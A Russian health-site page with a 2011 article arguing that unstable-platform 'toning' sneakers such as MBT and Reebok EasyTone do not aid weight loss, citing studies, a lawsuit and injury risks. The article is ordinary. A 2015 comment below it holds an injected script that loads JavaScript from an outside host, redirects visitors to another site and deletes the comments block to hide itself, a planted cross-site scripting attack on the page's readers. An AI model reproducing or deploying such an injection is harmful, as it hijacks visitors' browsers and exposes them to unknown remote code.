Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Кроссовки от аборигенов п...  >>  Кроссовки от аборигенов помогут похудеть?
 
Обратная связь
 

Кроссовки от аборигенов помогут похудеть?

Размер шрифта
12 августа 2011 07:01
  • google_analytics: false
  • Нравится

В конце 2009 года рынок спортивных товаров захлестнула настоящая волна – сразу четыре крупных бренда стали предлагать кроссовки для похудения на нестабильной платформе, которые имитируют ходьбу африканских кочевников масаев.

Масаи

Александр Тушкин / «Здоровье инфо»

Первой необычные кроссовки выпустила компания Masai Barefoot Technology. Ее основатель – швейцарский инженер Карл Мюллер – несколько лет наблюдал за африканским племенем масаев, в честь которых он и назвал свое детище.

Масаи – полукочевое племя скотоводов, рацион которых преимущественно состоит из животных жиров. Ученые долго дивились, как это масаи едят столько вредной пищи и при этом не толстеют и не умирают от сердечно-сосудистых заболеваний? Секрет оказался прост: кочевники ежедневно проходят пешком более 20 км. При этом они всегда ходят босиком. Карл Мюллер пришел к выводу, что ходьба без обуви по естественной поверхности полезна для тренировки мышц и формирует хорошую осанку.

Но в городе босиком особо не походишь – грязно, битое стекло, да и большинство поверхностей – ровные и твердые, не сравнить с мягкой пылью африканской земли. На городском асфальте босиком только еще больше собьешь ноги, рассудил инженер, и в 1996 году он запатентовал «физиологичные кроссовки».

Кроссовки – закачаешься!

MBT

Фото: us.mbt.com

MBT (Masai Barefoot Technology) – это обычные кроссовки (только очень уродливые) с необычной закругленной платформой, которая полностью меняет биомеханику ходьбы. На такой платформе невозможно поставить стопу ровно, поэтому приходится напрягать мышцы-стабилизаторы, как при ходьбе по песку или мягкой земле. Во время «физиологичной ходьбы» человек перестает наклоняться вперед и интуитивно выпрямляет спину. Походка превращается в серию «перекатываний» с ноги на ногу. За счет дополнительной работы мышц улучшается кровоснабжение суставов – колени и поясница разгружаются и меньше болят. Однако самое главное, на что напирает маркетинг – это похудение. В рекламе утверждается, что такие кроссовки увеличивают расход калорий. То есть делать ничего не надо (ну просто ходишь себе и все), а калории сжигаются (даже когда вы стоите на месте!). Ничего не напоминает?

В подтверждение своих слов компания приводит результаты научных исследований, которые были проведены в собственной академии MBT. Как-то не очень хочется им доверять.

Через некоторое время новинка появилась у конкурентов – крупных игроков рынка спортивных товаров. Маркетологи мигом учуяли: да это же новая ниша! И посыпались на нас со всех сторон кроссовки «от аборигенов».

Дизайнеров компании Reebok ужаснул уродливый вид MBT и они решили выпустить кроссовки под другим соусом. Так свет увидели Reebok EasyTone – привычные спортивные кроссовки но на той же балансирующей платформе. Под запуск новой модели было проведено даже клиническое исследование – якобы такая обувка заставляет ваши ягодичные мышцы работать на 28% активнее. При этом речь шла о небольшой работе, в которой женщины сделали всего 500 шагов.

Необычная обувь

Вы будете смеяться, но на рынке существуют даже тапочки для похудения. Производит их французская компания Cellulitte. Подошва таких тапочек в районе мыса значительно толще, чем у пятки. Это обеспечивает смещение центра тяжести при ходьбе, и человек якобы худеет.

Затем похожие кроссовки выпустили компании New Balance и Skechers. На данный момент в мире насчитывается более десятка похожих товаров с различными именами: toe-only rocker, rocker bar, mild rocker, heel-to-toe rocker, negative heel rocker и double rocker. В 2010 году объем продаж перевалил за 1,5 млрд долларов – это был самый быстрорастущий сегмент рынка. Однако к настоящему моменту буря на рынке стихла, и посыпались обвинения недовольных покупателей.

Земля закачалась под ногами

В январе 2011 года жительница Калифорнии Бистра Пашамова подала в суд на компанию New Balance. Она потребовала у компании 5 млн долларов за то, что не похудела, как обещала реклама.

Ученые подтверждают претензии простых американских женщин. В ходе исследования Университета Висконсина летом 2010 года было установлено, что пользы от ходьбы в таких кроссовках не больше, чем от обычных. Результаты исследования были подтверждены недавно, в июне 2011 года. Доктор Мерсер, профессор биомеханики из университета Невады заявил на ежегодном собрании спортивных врачей (American College of Sports Medicine), что толку от этих кроссовок нет: они не помогают тренироваться более интенсивно, сжигать больше калорий или улучшать силу мышц и их тонус.

– Да эти кроссовки просто не работают, – рассказал прессе адвокат Пашамовой.

Зато кроссовки с нестабильной платформой могут привести к серьезным проблемам со здоровьем. Например, к неожиданному падению на асфальт или к изнашиванию ахилловых сухожилий в результате долгого использования.

А что же случилось с Карлом Мюллером – прозорливым швейцарским инженером? Он ушел из компании MBT и основал другую, под названием kybun. И теперь торгует кроссовками kyBoot на воздушной подушке. То есть почти воздухом.

 

Фото: Sandra van der Steen / Shutterstock.com

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как уменьшить жир на лице?   6 вещей, которые нельзя делать для похудения   Быстрое похудение   Куркума для похудения  
05 августа 2011Худеющие и похудевшие думают по-разному 28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых
 
15 мая 2013Ура! Ходить по лестнице так же эффективно для похудения, как ходить в спортивный зал! 15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз!
 

Слайдшоу

1
Как нас обманывают! Продукты-обманщики!
10 вещей, которые поймут только те, кто хочет похудеть
От этой еды будет понос!

Тесты

1
Жиры, которые мы едим
Знаете ли вы, как работает ваш желудок?
Есть ли у вас избыточный вес?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.